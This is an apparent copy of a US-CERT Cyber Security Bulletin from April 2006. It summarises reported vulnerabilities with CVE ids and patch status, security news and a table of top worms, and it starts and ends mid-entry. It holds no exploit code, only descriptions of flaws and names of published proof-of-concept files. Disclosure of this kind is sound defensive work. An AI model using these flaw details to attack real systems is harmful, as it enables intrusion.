No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploits have been published.

Bugzero Multiple Cross-Site Scripting

CVE-2006-1580

4.7 Security Focus, Bugtraq ID: 17351, April 3, 2006

Wire Plastik Design

wpBlog 0.4

An SQL injection vulnerability has been reported in 'index.php' due to insufficient sanitization of the 'postid' parameter before using an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

wpBlog SQL Injection

CVE-2006-1639

5.6 Secunia Advisory: SA19538, April 4, 2006

ZDaemon
X-Doom

ZDaemon 1.08.01, X-Doom VI 1.6.7

Several vulnerabilities have been reported: a buffer overflow vulnerability was reported in the 'is_client_wad_ok' function, which could let a remote malicious user execute arbitrary code; and a remote Denial of Service vulnerability was reported in the 'ZD_MissingPlayer(),' 'ZD_UseItem(),' and 'ZD_ValidClient()' functions when an invalid value is submitted.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, zdaebof.zip, has been published.

Zdaemon Remote Buffer Overflow & Denial of Service

CVE-2006-1592
CVE-2006-1593

7
(CVE-2006-1592)

2.3
(CVE-2006-1593)

Security Focus, Bugtraq ID: 17340, March 31, 2006


Wireless Trends & Vulnerabilities
This section contains wireless vulnerabilities, articles, and malicious code that has been identified during the current reporting period.
  • Security Worries Hang Up Mobile Plans: Based on concerns over IT security, research indicates that many companies are putting a hold on the introduction of new wireless technologies. A survey published by Symantec and the research arm of UK-based newsmaker The Economist, the threat of virus attacks, potential flaws in smart phone software and a lack of wireless network access controls have forced many enterprise firms to slow down their adoption of additional mobile applications and devices.
  • Municipal Wi-Fi Could Cause Headaches: According to the chief technology officer for AirDefense, the largest concern is the ability to compromise the security of the corporate local area network (LAN) regardless of how it is set up. "Even if you have a policy of no Wi-Fi [usage], suddenly Wi-Fi is available on the lamp pole outside."
  • 802.11w fills wireless security holes: New cryptographic algorithms have been introduced by IEEE 802.11i, the standard behind Wi-Fi Protected Access and WPA 2, that patch the holes in the original Wired Equivalent Privacy specification. Now, the 802.11w task group is looking at extending the protection beyond data to management frames, which perform the core operations of a network.
  • Spy program snoops on cell phones: New software that hides on cell phones and captures call logs and text messages is being sold as a way to monitor kids and spouses. But according to one security company, it is a Trojan horse. The FlexiSpy application captures call logs, text messages and mobile Internet activity, among other things.


General Trends
This section contains brief summaries and links to articles which discuss or present information pertinent to the cyber security community.
  • Multiple Buffer Overflow Vulnerabilities in RealNetworks, Inc.'s Products: US-CERT is aware of multiple vulnerabilities in RealNetworks, Inc.'s Products. Each of these vulnerabilities may result in a buffer overflow within RealPlayer that could allow a remote attacker execute arbitrary code.
  • US Takes Interest in DDoS Attacks: Senior levels of the US government are taking an interest in recent distributed Denial of Service (DDoS) attacks against the internet's domain name system. In recent months, there have been large-scale and ongoing attacks against several DNS infrastructure providers, using a newly discovered method that enables the bad guys to greatly amplify the amount of attack traffic they can throw at their targets.
  • Active Exploitation of Cross-site Scripting Vulnerability in eBay.com: US-CERT is aware of an active exploitation of a cross-site scripting vulnerability in the eBay website. Successful exploitation may either allow an attacker to obtain sensitive data from stored cookies or redirect auction viewers to phishing sites where further disclosure of login credentials or personal information can occur. US-CERT VU#808921
  • Hackers Serve Rootkits with Bagles: According to F-Secure, the latest Bagle.GE variant loads a kernel-mode driver to hide the processes and registry keys of itself and other Bagle-related malware from security scanners. The use of offensive rootkits in existing virus threats signals an aggressive push by attackers to get around existing anti-virus software and maintain a persistent and undetectable presence on infected machines.
  • Survey: Identity theft hits 3 percent: According to a study based on the National Crime Victimization Survey (NCVS), an estimated 3.1 percent of American households became victims of identity theft in 2004. The study, which surveyed 42,000 households, found the most likely families to suffer identity theft included those with a young head of household (18 to 24 years of age) and those in the highest income bracket (greater than $75,000 per year). Identity theft was identified as the unauthorized use or attempted use of existing credit cards, accounts such as checking or brokerage accounts, or the misuse of information to obtain new credit accounts or to commit crimes.
  • 0603-exploits.tgz: Packet Storm new exploits for March, 2006.
  • Vendors failing to secure applications: According to Alan Pallar, director of research for Sans, weak digital security in businesses helps hackers to fund criminal activity. Software application vendors are still failing to sell secure products and it is a problem that is leaving customers open to hacking attacks.


Viruses/Trojans

Top Ten Virus Threats

A list of high threat viruses, as reported to various anti-virus vendors and virus incident reporting organizations, has been ranked and categorized in the table below. For the purposes of collecting and collating data, infections involving multiple systems at a single location are considered a single infection. It is therefore possible that a virus has infected hundreds of machines but has only been counted once. With the number of viruses that appear each month, it is possible that a new virus will become widely distributed before the next edition of this publication. To limit the possibility of infection, readers are reminded to update their anti-virus packages as soon as updates become available. The table lists the viruses by ranking (number of sites affected), common virus name, type of virus code (i.e., boot, file, macro, multi-partite, script), trends (based on number of infections reported since last week), and approximate date first found.

Rank
Common Name
Type of Code
Trend
Date
Description
1 Netsky-P Win32 Worm
Stable
March 2004 A mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into various shared folder.
2 Zafi-B Win32 Worm
Stable
June 2004 A mass-mailing worm that spreads via e-mail using several different languages, including English, Hungarian and Russian. When executed, the worm makes two copies of itself in the %System% directory with randomly generated file names.
3 Lovgate.w Win32 Worm
Stable
April 2004 A mass-mailing worm that propagates via by using MAPI as a reply to messages, by using an internal SMTP, by dropping copies of itself on network shares, and through peer-to-peer networks. Attempts to access all machines in the local area network.
4 Mytob.C Win32 Worm
Increase
March 2004 A mass-mailing worm with IRC backdoor functionality which can also infect computers vulnerable to the Windows LSASS (MS04-011) exploit. The worm will attempt to harvest email addresses from the local hard disk by scanning files.
5 Mytob-GH Win32 Worm
Slight Decrease
November 2005 A variant of the mass-mailing worm that disables security related programs and allows other to access the infected system. This version sends itself to email addresses harvested from the system, forging the sender’s address.
6 Nyxum-D Win32 Worm
New
March 2006 A mass-mailing worm that turns off anti-virus, deletes files, downloads code from the internet, and installs in the registry. This version also harvests emails addresses from the infected machine and uses its own emailing engine to forge the senders address.
7 Netsky-D Win32 Worm
Decrease
March 2004 A simplified variant of the Netsky mass-mailing worm in that it does not contain many of the text strings that were present in NetSky.C and it does not copy itself to shared folders. Netsky.D spreads itself in e-mails as an executable attachment only.
8 Mytob-BE Win32 Worm
Increase
June 2005 A slight variant of the mass-mailing worm that utilizes an IRC backdoor, LSASS vulnerability, and email to propagate. Harvesting addresses from the Windows address book, disabling antivirus, and modifying data.
9 Mytob-AS Win32 Worm
Decrease
June 2005 A slight variant of the mass-mailing worm that disables security related programs and processes, redirection various sites, and changing registry values. This version downloads code from the net and utilizes its own email engine.
10 Zafi-D Win32 Worm
Slight Decrease
December 2004 A mass-mailing worm that sends itself to email addresses gathered from the infected computer. The worm may also attempt to lower security settings, terminate processes, and open a back door on the compromised computer.

Table updated April 3, 2006

[back to top]

 

 

 

Last updated

The US-CERT Cyber Security Bulletin provides a summary of new and updated vulnerabilities, exploits, trends, and malicious code that have recently been openly reported. Information in the Cyber Security Bulletin is a compilation of open source and US-CERT vulnerability information. As such, the Cyber Security Bulletin includes information published by sources outside of US-CERT and should not be considered the result of US-CERT analysis or as an official report of US-CERT. Although this information does reflect open source reports, it is not an official description and should be used for informational purposes only. The intention of the Cyber Security Bulletin is to serve as a comprehensive directory of pertinent vulnerability reports, providing brief summaries and additional sources for further investigation.

Vulnerabilities
Wireless Trends & Vulnerabilities
General Trends
Viruses/Trojans


Vulnerabilities

The tables below summarize vulnerabilities that have been reported by various open source organizations or presented in newsgroups and on web sites. Items in bold designate updates that have been made to past entries. Entries are grouped by the operating system on which the reported software operates, and vulnerabilities which affect both Windows and Unix/ Linux Operating Systems are included in the Multiple Operating Systems table. Note, entries in each table are not necessarily vulnerabilities in that operating system, but vulnerabilities in software which operate on some version of that operating system.

Entries may contain additional US-CERT sponsored information, including Common Vulnerabilities and Exposures (CVE) numbers, National Vulnerability Database (NVD) links, Common Vulnerability Scoring System (CVSS) values, Open Vulnerability and Assessment Language (OVAL) definitions, or links to US-CERT Vulnerability Notes. Metrics, values, and information included in the Cyber Security Bulletin which has been provided by other US-CERT sponsored programs, is prepared, managed, and contributed by those respective programs. CVSS values are managed and provided by the US-CERT/ NIST National Vulnerability Database. Links are also provided to patches and workarounds that have been provided by the product’s vendor.

The Risk levels are defined below:

High - Vulnerabilities will be labeled “High” severity if they have a CVSS base score of 7.0-10.0.

Medium - Vulnerabilities will be labeled “Medium” severity if they have a base CVSS score of 4.0-6.9.

Low - Vulnerabilities will be labeled “Low” severity if they have a CVSS base score of 0.0-3.9.

Note that scores provided prior to 11/9/2005 are approximated from only partially available CVSS metric data. Such scores are marked as "Approximated" within NVD. In particular, the following CVSS metrics are only partially available for these vulnerabilities and NVD assumes certain values based on an approximation algorithm: AccessComplexity, Authentication, ConfImpact of 'partial', IntegImpact of 'partial', AvailImpact of 'partial', and the impact biases.

Windows Operating Systems Only
Vendor & Software Name
Description

Common Name

CVSS
Resources
AN HTTPD 1.42n

A vulnerability has been reported in AN HTTPD that could let remote malicious users disclose information, script source.

Contact the vendor for AN HTTPD 1.42p.

Currently we are not aware of any exploits for this vulnerability.

AN HTTPD Information Disclosure

CVE-2006-1598

3.3 Secunia, Advisory: SA19326, April 3, 2006

Eset Software

NOD32 Antivirus 2.5

A vulnerability has been reported in NOD32 Antivirus that could let local malicious users obtain arbitrary file creation rights.

Upgrade to NOD32 Antivirus 2.51.26 via tool's online update capabilities.

There is no exploit code required.

NOD32 Antivirus Arbitrary File Creation

CVE-2006-0951

Not Available Secunia, Advisory: SA19054, April 5, 2006
EzASPSite 2.0 RC3

An input validation vulnerability has been reported in ExASPSite that could let remote malicious users perform SQL injection.

No workaround or patch available at time of publishing.

There is no exploit code required.

EzASPSite Default.ASP SQL Injection Vulnerability

CVE-2006-1541

3.3 Secunia, Advisory: SA19441, March 30, 2006

HP

Color LaserJet Toolbox 2500 and 4600 for Windows

An input validation vulnerability has been reported in Color LaserJet Toolbox that could let remote malicious users disclose information.

HP Solution

A Proof of Concept exploit has been published.

HP Color LaserJet Toolbox Information Disclosure

CVE-2006-1654

Not Available Security Focus, ID: 17367, April 4, 2006

McAfee

VirusScan 10.0.21, SecurityCenter Agent 6.0.0.16

A buffer overflow vulnerability has been reported in VirusScan, DUNZIP32.dll, that could let remote malicious users obtain unauthorized access.

Upgrade to newest version of DUNZIP32.dll via tools online update capabilities.

There is no exploit code required.

McAfee VirusScan Unauthorized Access

CVE-2004-1094

10 Secunia, Advisory: SA19460, March 30, 2006

McAfee

WebShield SMTP 4.5 MR1a

A vulnerability has been reported in WebShield that could let remote malicious users execute arbitrary code.

McAfee WebShield 4.5 MR2

There is no exploit code required.

McAfee WebShield Arbitrary Code Execution

CVE-2006-0559

10 Security Tracker, Alert ID: 1015861, April 4, 2006

Microsoft

Office XP, XP SP1, XP SP2, XP SP3

A vulnerability has been reported in Office XP, array index, that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, excel_03262006.rar, has been published.

Microsoft Office XP Denial of Service

CVE-2006-1540

1.4 Security Focus, ID: 17252, March 27, 2006

Microsoft

Windows Help File Viewer

A heap overflow vulnerability has been reported in Windows Help File Viewer that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

Currently we are not aware of any exploits for this vulnerability.

Microsoft Windows Help File Viewer Arbitrary Code Execution

CVE-2006-1591

5.6 Security Focus, ID: 17325, March 31, 2006

RealPlayer 8, 10, 10.0.6, 10.5, RealOne Player, and RealPlayer Enterprise

A buffer overflow vulnerability has been reported in RealPlayer, Mimio Broadcast file processing, that could let remote malicious users execute arbitrary code.

RealPlayer

There is no exploit code required.

RealPlayer Arbitrary Code Execution

CVE-2006-1370

7

Security Tracker, Alert ID: 1015810, March 24, 2006

US-CERT VU#451556

SiteSearch Indexer 3.5

An input validation vulnerability has been reported in SiteSearch Indexer, searchresults.asp, that could let remote malicious users conduct Cross-Site Scripting.

No workaround or patch available at time of publishing.

A Proof of Concept exploit has been published.

SiteSearch Indexer Cross-Site Scripting

CVE-2006-1567

2.3 Security Focus, ID: 17332, March 31, 2006

SMART Technologies

SynchronEyes 6.0

Multiple vulnerabilities have been reported in SynchronEyes that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

There is no exploit code required.

SynchronEyes Denial of Service

CVE-2006-1647
CVE-2006-1648

Not Available Security Focus, ID: 17373, April 4, 2006
Total Commander prior to 6.54

A buffer overflow vulnerability has been reported in Total Commander that could let remote malicious users execute arbitrary code.

Total Commander 6.54

There is no exploit code required.

Total Commander Arbitrary Code Execution Not Available Security Tracker, Alert ID: 1015852, March 31, 2006
UltraVNC 1.0.1

Multiple buffer overflow vulnerabilities have been reported in UltraVNC that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, uvncbof.zip, has been published.

UltraVNC Arbitrary Code Execution

CVE-2006-1652

Not Available Security Focus, ID: 17378, April 4, 2006

UNIX / Linux Operating Systems Only
Vendor & Software Name
Description

Common Name

CVSS
Resources

Apple

Mac OS X Server 10.4.5, OS X 10.4.5

A vulnerability has been reported on Intel-based Macintosh computers due to an unspecified error, which could let a remote malicious user bypass the firmware password.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Mac OS X Firmware Password Bypass

CVE-2006-0401

4.9 Apple Security Advisory, APPLE-SA-2006-04-03, April 3, 2006

Apple

Safari RSS 2.3 pre-release, 2.0-2.0.2, 1.3, 1.2-1.2.3, 1.0, 1.1, Beta 2, Mac OS X Server 10.4-10.4.5, Mac OS X 10.4-10.4.5

A remote Denial of Service vulnerability has been reported in 'ImageIO' due to a failure to process malicious image files.

No workaround or patch available at time of publishing.

There is no exploit code required.

Apple Mac OS X Remote Denial of Service

CVE-2006-1552

2.3 Security Focus, Bugtraq ID: 17321, March 30, 2006

BusyBox

BusyBox Linux Utilities

A vulnerability has been reported in 'passwd' due to a design flaw that results in password hashes being created in an insecure manner, which could let a malicious user bypass security restrictions.

No workaround or patch available at time of publishing.

Precomputed password hashes can be used to exploit this vulnerability.

BusyBox Insecure Password Hash

CVE-2006-1058

1.6 Secunia Advisory: SA19477, March 31, 2006

Crafty Syntax Image Gallery

Crafty Syntax Image Gallery 3.1g.

Several vulnerabilities have been reported: an SQL injection vulnerability was reported in 'slides.php' due to insufficient sanitization of the 'limitquery_s' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported due to insufficient verification of images during the upload process, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, an exploit script, crappy_syntax.pl, has been published.

Crafty Syntax Image Gallery SQL Injection & Image Verification
Not Available Secunia Advisory: SA19478, April 5, 2006

Free
RADIUS

FreeRADIUS 1.0-1.0.5

A vulnerability has been reported in the EAP-MSCHAPv2 state machine due to an error, which could let a malicious user bypass authentication and cause a Denial of Service.

Updates available

SuSE

RedHat

Gentoo

Currently we are not aware of any exploits for this vulnerability.

FreeRADIUS EAP-MSCHAPv2 Authentication Bypass

CVE-2006-1354

8

Security Focus, Bugtraq ID: 17171, March 21, 2006

SUSE Security Announcement, SUSE-SA:2006:019, March 28, 2006

RedHat Security Advisory, RHSA-2006:0271-11, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-03, April 4, 2006

GNU

Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in 'Scrubber.py' due to a failure to handle exception conditions when Python fails to process an email file attachment that contains utf8 characters in its filename.

Mandriva

SuSE

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Attachment Scrubber UTF8 Filename Remote Denial of Service

CVE-2005-3573

Secunia Advisory: SA17511, November 14, 2005

Mandriva Linux Security Advisory, MDKSA-2005:222, December 2, 2005

SUSE Security Summary Report, SUSE-SR:2006:001, January 13, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GNU

GNU Privacy Guard prior to 1.4.2.2.

A vulnerability has been reported caused due to an error in the detection of unsigned data, which could let a remote malicious user inject arbitrary data and bypass verification.

Updates available

Debian

Gentoo

Fedora

SuSE

Slackware

RedHat

Ubuntu

Trustix

SGI

There is no exploit code required.

GnuPG Unsigned Data Injection Detection

CVE-2006-0049

GNU Security Advisory, March 9, 2006

Debian Security Advisory, DSA 993-1, March 10, 2006

Gentoo Linux Security Advisory, GLSA 200603-08, March 10, 2006

SUSE Security Announcement, SUSE-SA:2006:014, March 10, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

Ubuntu Security Notice, USN-264-1, March 13, 2006

Trustix Secure Linux Security Advisory #2006-0014, March 20, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GnuPG

GnuPG / gpg prior to 1.4.2.1

A vulnerability has been reported because 'gpgv' exits with a return code of 0 even if the detached signature file did not carry any signature (if 'gpgv" or "gpg --verify' is used), which could let a remote malicious user bypass security restrictions.

Patches available

Fedora

Debian

Mandriva

Ubuntu

Gentoo

SuSE

SuSE

SuSE

Slackware

RedHat

SGI

There is no exploit code required; however, a Proof of Concept exploit has been published.

GnuPG Detached Signature Verification Bypass

CVE-2006-0455

4.9

GnuPG Advisory, February 15, 2006

Fedora Update Notification,
FEDORA-2006-116, February 17, 2006

Debian Security Advisory,
DSA-978-1, February 17, 2006

Mandriva Security Advisory, MDKSA-2006:043, February 17, 2006

Ubuntu Security Notice, USN-252-1, February 17, 2006

Gentoo Linux Security Advisory, GLSA 200602-10, February 18, 2006

SuSE Security Announcement, SUSE-SA:2006:009, February 20, 2006

SUSE Security Announcement, SUSE-SA:2006:013, March 1, 2006

SUSE Security Summary Report, SUSE-SR:2006:005, March 3, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Hitachi

XFIT/S/ZGN 0,
XFIT/S XFIT/S/JCA 0,
XFIT/S XFIT/S, ZENGIN 0, XFIT/S XFIT/S 0

A remote Denial of Service vulnerability has been reported due to an unspecified error when the service receives data unexpectedly.

Update information

Currently we are not aware of any exploits for this vulnerability.

Hitachi XFIT/S Remote Denial of Service

CVE-2006-1609

2.3 Hitachi Security Advisory, HS06-004, March 31, 2006

Horde Project

Horde Application Framework 3.0.9 & prior

A vulnerability has been reported in 'services/go.php' due to insufficient verification of the 'url' parameter before using in a 'readfile()' call, which could let a remote malicious user obtain sensitive information.

Updates available

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Horde Information Disclosure

CVE-2006-1260

2.3

Secunia Advisory: SA19246, March 15, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Kaffeine

Kaffeine Media Player 0.4.2-0.7.1

A buffer overflow vulnerability has been reported in the 'http_peek()' function when creating HTTP request headers for retrieving remote playlists, which could let a remote malicious user execute arbitrary code.

Patches available

Debian

Mandriva

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Kaffeine Buffer Overflow

CVE-2006-0051

5.6

KDE Security Advisory, April 4, 2006

Debian Security Advisory,
DSA-1023-1, April 5, 2006

Mandriva Linux Security Advisory MDKSA-2006:065, April 5, 2006

Gentoo Linux Security Advisory, GLSA 200604-04, April 5, 2006

MediaWiki

MediaWiki 1.5.7

An HTML injection vulnerability has been reported in the Encoded Page Link due to insufficient sanitization of user-supplied input before using it in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

MediaWiki HTML Injection

CVE-2006-1498

2.3

Security Focus, Bugtraq ID: 17269, March 27, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-01, April 4, 2006

mpg123

mpg123 0.59 r

A vulnerability has been reported when handling MP3 streams, which could let a remote malicious user corrupt memory or possibly execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept Denial of Service exploit script, mpg1DoS3.pl, has been published.

MPG123 Malformed MP3 File Memory Corruption

CVE-2006-1655

Not Available Security Focus, Bugtraq ID: 17365, April 4, 2006

Multiple Vendors

Linux kernel 2.6- 2.6.14

A Denial of Service vulnerability has been reported in 'net/ipv6/udp.c' due to an infinite loop error in the 'udp_v6_get_port()' function.

Fedora

Upgrades available

Ubuntu

SUSE

RedHat

RedHat

RedHat

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPV6 Denial of Service

CVE-2005-2973

Secunia Advisory: SA17261, October 21, 2005

Fedora Update Notifications,
FEDORA-2005-1007 & 1013, October 20, 2005

Security Focus, Bugtraq ID: 15156, October 31, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RedHat Fedora Core4, Enterprise Linux WS 3, WS 2.1 IA64, WS 2.1, ES 3, ES 2.1 IA64, ES 2.1, AS 3, AS 2.1 IA64, AS 2.1, Advanced Workstation for the Itanium Processor 2.1 IA64, 2.1;
PHP PHP 5.1-5.1.3, 5.0-5.0.2, 4.4.0-4.4.2, 4.3-4.3.11, 4.2-4.2.3, 4.1.0-4.1.2, 4.0.0-4.0.7

A Cross-site scripting vulnerability has been reported in 'phpinfo()' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

A CVS fix is available.

Vulnerability may be exploited with a web client.

PHP 'PHPInfo' Cross-Site Scripting
Not Available Security Focus, Bugtraq ID: 17362, April 4, 2006

Multiple Vendors

Squid Web Proxy Cache 2.5 .STABLE3-STABLE10, STABLE1

A remote Denial of Service vulnerability has been reported when handling certain client NTLM authentication request sequences.

Upgrades available

Ubuntu

Debian

Mandriva

SCO

SUSE

RedHat

RHSA-2006:0045-8

SGI

Currently we are not aware of any exploits for this vulnerability.

Squid NTLM Authentication Remote Denial of Service

CVE-2005-2917

Secunia Advisory: SA16992, September 30, 2005

Ubuntu Security Notice, USN-192-1, September 30, 2005

Debian Security Advisory, DSA 828-1, September 30, 2005

Mandriva Linux Security Update Advisory, MDKSA-2005:181, October 11, 2005

SCO Security Advisory, SCOSA-2005.44, November 1, 2005

SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005

SUSE Security Summary Report, SUSE-SR:2005:027, November 18, 2005

RedHat Security Advisory, RHSA-2006:0052-7, March 7, 2006

RedHat Security Advisory, RHSA-2006:0045-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 10.2 x86_64, 10.2, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14, 1.0, 1.1; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A remote Denial of Service vulnerability has been reported in the attachment-scrubber utility.

Update to version 2.1.6 or later.

Mandriva

Ubuntu

Debian

There is no exploit code required.

GNU Mailman Attachment Scrubber Remote Denial of Service

CVE-2006-0052

Security Focus, Bugtraq ID: 17311, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:061, March 29, 2006

Ubuntu Security Notice, USN-267-1, April 03, 2006

Debian Security Advisory,
DSA-1027-1, April 6, 2006

Multiple Vendors

Linux kernel
2.6 prior to 2.6.12.1

 

A vulnerability has been reported in the 'restore_sigcontext()' function due to a failure to restrict access to the 'ar.rsc' register, which could let a malicious user cause a Denial of Service or obtain elevated privileges.

Linux Kernel

SUSE

RedHat:

RedHat

Debian

Conectiva

Debian

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel 64 Bit 'AR-RSC' Register Access

CVE-2005-1761

Security Tracker Alert ID: 1014275, June 23, 2005

SUSE Security Announce-
ment, SUSE-SA:2005:044, August 4, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Debian Security Advisories, DSA 921-1 & 922-1, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.12 .1

A vulnerability has been reported due to insufficient authorization before accessing a privileged function, which could let a malicious user bypass IPSEC policies.

Ubuntu

This issue has been addressed in Linux kernel 2.6.13-rc7.

SUSE

RedHat

RedHat

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPSec Policies Authorization Bypass

CVE-2005-2555

Ubuntu Security Notice, USN-169-1, August 19, 2005

Security Focus, Bugtraq ID 14609, August 19, 2005

Security Focus, Bugtraq ID 14609, August 25, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14

A Denial of Service vulnerability has been in 'sysctl.c' due to an error when handling the un-registration of interfaces in '/proc/sys/net/ipv4/conf/.'

Upgrades available

Ubuntu

RedHat

RedHat

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required.

Linux Kernel 'Sysctl' Denial of Service

CVE-2005-2709

Secunia Advisory: SA17504, November 9, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14, 2.5.0- 2.5.69, 2.4-2.4.32, 2.3, 2.3.x, 2.3.99, pre1-pre7, 2.2-2.2.27, 2.1, 2.1 .x, 2.1.89, 2.0.28-2.0.39

A vulnerability has been reported due to the way console keyboard mapping is handled, which could let a malicious user modify the console keymap to include scripted macro commands.

Mandriva

Fedora

Conectiva

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required; however, a Proof of Concept exploit has been published.

Linux Kernel Console Keymap Arbitrary Command Injection

CVE-2005-3257

Security Focus, Bugtraq ID: 15122, October 17, 2005

Mandriva Linux Security Advisories, MDKSA-2005:218, 219 & 220, November 30, 2005

Fedora Update Notification,
FEDORA-2005-1138, December 13, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14; SuSE Linux Professional 10.0 OSS, Linux Personal 10.0 OSS;
RedHat Fedora Core4

A Denial of Service vulnerability has been reported in 'ptrace.c' when 'CLONE_THREAD' is used due to a missing check of the thread's group ID when trying to determine whether the process is attempting to attach to itself.

Upgrades available

Fedora

SUSE

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel PTrace 'CLONE_
THREAD' Denial of Service

CVE-2005-3783

Secunia Advisory: SA17761, November 29, 2005

Fedora Update Notification,
FEDORA-2005-1104, November 28, 2005

SuSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.15

A Denial of Service vulnerability has been reported in the 'time_out_leases()' function because 'printk()' can consume large amounts of kernel log space.

Patches available

Trustix

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

An exploit script has been published.

Linux Kernel PrintK Local Denial of Service

CVE-2005-3857

Security Focus, Bugtraq ID: 15627, November 29, 2005

Trustix Secure Linux Security Advisory, TSLSA-2005-0070, December 9, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RealOne Helix Player 1.x,
RealOne Player v1, v2,
RealPlayer 10.x, 8,
